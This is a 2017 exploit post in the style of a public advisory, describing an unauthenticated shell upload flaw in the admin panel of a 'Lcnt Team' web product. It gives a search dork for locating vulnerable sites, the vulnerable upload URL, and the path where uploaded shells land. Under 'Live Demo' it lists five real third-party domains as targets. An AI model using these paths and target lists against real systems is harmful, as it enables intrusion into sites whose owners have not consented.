Lcnt Team Shell Upload Vulnerability

2017.04.11

xBADGIRL21 (MR)

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

##############################
# [xBADGIRL21] #
# [N3W PUBLIC 3XPL0IT] #
# _,________ #
# 0day _T _==____() -- #
# /##(_)-' #
# /##/ #
# x21 #
##############################
# Exploit Title : Lcnt Team Shell Upload Vulnerability
# Exploit Author : xBADGIRL21
# Dork : CopyRight 2006-2017 温州龙诚互联科技有限公司 Lcnt Team
# Vendor : http://icnt.net
# Tested on: [WIN7]
# MyBlog : http://xbadgirl21.blogspot.com
# Date: 10-04-2017
# video Proof : https://youtu.be/s5hF8CQzKgM
[*] To buy or Donate my BTC: 1Bgqu8faM8SPrArjoWRofRaTbMdes16mRz
######################
#|X|B|A|D|G|I|R|L|2|1|
######################
# [+] Poc :
######################
# [!] Exploit : http://127.0.0.1/admin/pic_add.php?Element=shopspic
# [!] Shell Path : http://127.0.0.1/admin/lcnt/[RANDOM_NUM].php
######################
# [!] Live Demo :
######################
# http://trofom.com/admin/pic_add.php?Element=shopspic
# http://www.chinaomay.com/admin/pic_add.php?Element=shopspic
# http://bisco.net.cn/admin/pic_add.php?Element=shopspic
# http://www.wzican.com/admin/pic_add.php?Element=shopspic
# http://www.raxinte.com/admin/pic_add.php?Element=shopspic
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
######################

References:

https://youtu.be/s5hF8CQzKgM

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Lcnt Team Shell Upload Vulnerability

Dork: CopyRight 2006-2017 温州龙诚互联科技有限公司 Lcnt Team

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.